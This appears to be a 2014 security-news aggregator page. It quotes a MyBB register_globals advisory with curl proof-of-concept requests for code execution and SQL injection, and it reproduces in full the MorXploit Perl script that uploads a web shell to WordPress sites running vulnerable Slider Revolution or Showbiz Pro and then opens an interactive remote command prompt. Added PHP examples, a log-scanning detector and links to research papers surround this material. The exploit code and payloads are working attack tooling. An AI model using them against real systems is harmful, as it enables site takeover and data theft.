$shutdown\_functions is not initialized correctly: add\_shutdown() only
creates the array when it does not already exist, so with
register\_globals = On a shutdown\_functions array supplied in the
request is kept as-is and later handed to call\_user\_func\_array(),
resulting in arbitrary code execution.
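An added example, not MyBB's own code or its fix, showing the two registry shapes side by side on a simulated register\_globals request: the conditional initialisation that keeps a request-seeded array, and a private static registry that the request cannot reach. send\_mail\_queue() is a stub, and the pre-seeded array stands in for what register\_globals would create.

```php
<?php
// Added example, not MyBB's code: a registry that is only created when missing
// is unsafe under register_globals; a registry kept out of the global symbol
// table is not. Both receive the same legitimate registration.
function send_mail_queue() {}   // stand-in for the real shutdown task

// Constructed stand-in for what register_globals = On does before the script
// runs when the request carries shutdown_functions[0][function]=phpinfo.
$shutdown_functions = array(
    array('function' => 'phpinfo', 'arguments' => array(-1)),
);

// Same logic as add_shutdown() on the page: the array is created only when it
// is not already an array, so a request-seeded one survives untouched.
function add_shutdown_weak($name, $arguments = array())
{
    global $shutdown_functions;
    if (!is_array($shutdown_functions)) {
        $shutdown_functions = array();
    }
    if (is_string($name) && function_exists($name)) {
        $shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
        return true;
    }
    return false;
}

// Hardened shape: private static storage, initialised unconditionally.
// No variable a request can register reaches it.
final class ShutdownRegistry
{
    private static $functions = array();
    public static function add($name, array $arguments = array())
    {
        $callable = (is_string($name) && function_exists($name))
            || (is_array($name) && count($name) === 2 && method_exists($name[0], $name[1]));
        if (!$callable) {
            return false;
        }
        self::$functions[] = array('function' => $name, 'arguments' => $arguments);
        return true;
    }
    // Callback names in the order they would run at shutdown.
    public static function names()
    {
        $names = array();
        foreach (self::$functions as $f) {
            $names[] = is_array($f['function']) ? implode('::', $f['function']) : $f['function'];
        }
        return $names;
    }
}

add_shutdown_weak('send_mail_queue');      // the registration init.php performs
ShutdownRegistry::add('send_mail_queue');

// Weak registry: the request-seeded phpinfo entry sits ahead of send_mail_queue.
print_r(array_map(function ($f) { return $f['function']; }, $shutdown_functions));
// Hardened registry: send_mail_queue only.
print_r(ShutdownRegistry::names());
```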

##III. Proof of Concept

With request\_order = "GP" and register\_globals = On, remote code
execution takes nothing more than curl on the command line:

```
$ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo;
shutdown_functions[0][arguments][]=-1" http://www.target/
```

##IV. P.S.I

**Another case to exploit the vulnerability:**

When PHP's disable\_functions directive disables the ini\_get()
function:

```
disable_functions = ini_get
```

the @ini\_get("register\_globals") call below fails silently and never
returns 1, so the unset\_globals() calls are skipped regardless of
whether register\_globals is on or off:

```
       if(@ini_get("register_globals") == 1)
       {
           $this->unset_globals($_POST);
           $this->unset_globals($_GET);
           $this->unset_globals($_FILES);
           $this->unset_globals($_COOKIE);
       }
```

**Proof of Concept**

Works on disable\_functions = ini\_get and register\_globals = On:

```
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
```

##V. P.S.II

**SQL injection vulnerability via run\_shutdown() function**

```
function run_shutdown()
{
        global $config, $db, $cache, $plugins, $error_handler,
$shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
        ...
        // We have some shutdown queries needing to be run
        if(is_array($shutdown_queries))
        {
                // Loop through and run them all
                foreach($shutdown_queries as $query)
                {
                        $db->query($query);
                }
        }
```

The $shutdown\_queries array is initialized in global.php:

```
$shutdown_queries = array();
```

But not every entry point includes global.php; css.php, for example, only pulls in init.php:

```
require_once "./inc/init.php";
```

Since global.php is never included there, $shutdown\_queries is left
uninitialized, so with register\_globals it can be supplied from the
request and ends up in $db->query(), with the result that there is a
SQL injection vulnerability.

**Proof of Concept**

Works on request\_order = "GP" and register\_globals = On:

```
$ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj"
http://www.target/css.php
```

Works on disable\_functions = ini\_get and register\_globals = On:

```
css.php?shutdown_queries[]=SQL_Inj
```

##VI. Disclosure Timeline

* 2014.03.06 - Notified the MyBB devs via security contact form
* 2014.11.16 - Renotified the MyBB devs via the Private Inquiries forum because there was no reply
* 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16
* 2014.11.21 - Public Disclosure

CITAS – Computer Intrusion Threat Assessment System

Last weekend, I was at a small conference and one of the people whose presentations I attended was an FBI special agent named John B. Chesson.

After he got through the obligatory introductory material about what the FBI does, what the challenges are, and how computer security at typical companies is done (or, in too many cases, not done) his presentation turned to a proposal for a particular new methodology for helping companies achieve some degree of security. That methodology is called CITAS – which stands for Computer Intrusion Threat Assessment System.

more here..........http://dillingers.com/blog/2014/11/24/citas-threat-assessment-system/

Paper: Erlang Security 101

NCC Group’s Security Technical Assurance team performs code reviews for clients on numerous
different programming languages. Some are well understood from a security perspective (e.g. C,
C++, C#, PHP and Python etc.) and some less so. We’ve been doing Erlang security focused code
reviews for over four years and built up a body of knowledge on the subject. It is also understood that
proactive developer training and awareness earlier in the development lifecycle can yield significant
security benefits.

more here..........https://www.nccgroup.com/media/481611/erlang_security_101_v1-0.pdf

Slider Revolution/Showbiz Pro shell upload exploit

#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro) 
# Products url: 
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content with highly customizable transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updating plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1" 
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
#> POST /wp-admin/admin-ajax.php HTTP/1.1
#> User-Agent: curl/7.35.0
#> Host: ****.com
#> Accept: */*
#> Content-Length: 73
#> Content-Type: application/x-www-form-urlencoded
#> 
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# < 
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading an web shell:
# The following perl exploit will try to upload an HTTP php shell through the update_plugin function
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them in the same directory where you have the exploit.

# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$ 
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the LFI vulnerability that was published a couple of months ago, this is another vulnerability that revslider developers have
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (>= 3.0.96) vulnerable to this nasty flaw. Revslider developers will argue that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes' users may not get
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
# auto-update feature on, otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
# as well as the ability to dump the entire wordpress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!

use LWP::UserAgent;
use MIME::Base64;
use strict;

sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Revslider/Showbiz shell upload exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}

if (!defined $ARGV[0] || !defined $ARGV[1]) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}

my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";

unless (-e $zip1 && -e $zip2) {
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}

my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;

if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}

elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}

elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}

else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}

elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content; 
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);

while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit") {
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}
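From the defender's side, an added example (not part of this advisory) that scans web-server access-log lines for the footprint the PoC above leaves behind: requests into a slider plugin's temp/update\_extract/ directory, with or without a cmd parameter. The log lines, regexes and function names are constructed here; the update\_plugin POST itself does not show up in access logs because request bodies are not recorded.

```php
<?php
// Added example, not part of the advisory: flag access-log lines that match
// the post-exploitation footprint described above. Log lines and patterns
// below are constructed for this demonstration.

// Common log format: ip ident user [time] "METHOD URL PROTO" status
const LOG_PATTERN = '#^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})#';

// Anything served out of the update extraction directory is suspect; a cmd
// parameter on top of that is the extra tell from the PoC's own shell URL.
const SUSPECT_PATH = '#/wp-content/plugins/(revslider|showbiz)/temp/update_extract/#';

function parse_log_line($line)
{
    if (!preg_match(LOG_PATTERN, $line, $m)) {
        return null;   // not a line this parser understands
    }
    return array('ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
                 'url' => $m[4], 'status' => (int) $m[5]);
}

// Returns a verdict string for suspect entries, null otherwise.
function classify(array $entry)
{
    if (!preg_match(SUSPECT_PATH, $entry['url'])) {
        return null;
    }
    $query = parse_url($entry['url'], PHP_URL_QUERY);
    parse_str((string) $query, $params);
    return isset($params['cmd']) ? 'command sent to extracted file' : 'access to update_extract';
}

// Constructed sample: the admin-ajax POST (body not logged, so it cannot be
// told apart here), a shell call with a base64-encoded "id", and normal traffic.
$lines = array(
    '203.0.113.7 - - [25/Nov/2014:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [25/Nov/2014:10:00:02 +0000] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?cmd=aWQ= HTTP/1.1" 200 87',
    '198.51.100.4 - - [25/Nov/2014:10:00:03 +0000] "GET /wp-content/plugins/revslider/js/slider.js HTTP/1.1" 200 1024',
);

foreach ($lines as $line) {
    $entry = parse_log_line($line);
    if ($entry === null) {
        continue;
    }
    $verdict = classify($entry);
    if ($verdict !== null) {
        printf("%s %s %s -> %s\n", $entry['time'], $entry['ip'], $entry['url'], $verdict);
    }
}
```

Only the second line is reported; a hit on the extraction directory alone is worth reviewing, since that path is not served to visitors in normal use.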

Close Encounters with Symbolic Execution

At THREADS 2014, I demonstrated a new capability of mcsema that enables the use of KLEE, a symbolic execution framework, on software available only in binary form. In the talk, I described how to use mcsema and KLEE to learn an unknown protocol defined in a binary that has never been seen before. In the example, we learned the series of steps required to navigate through a maze. Our competition in the DARPA Cyber Grand Challenge requires this capability — our “reasoning system” will have no prior knowledge and no human guidance, yet must learn to speak with dozens, hundreds, or thousands of binaries, each with unique inputs.

more here........http://blog.trailofbits.com/2014/11/25/close-encounters-with-symbolic-execution/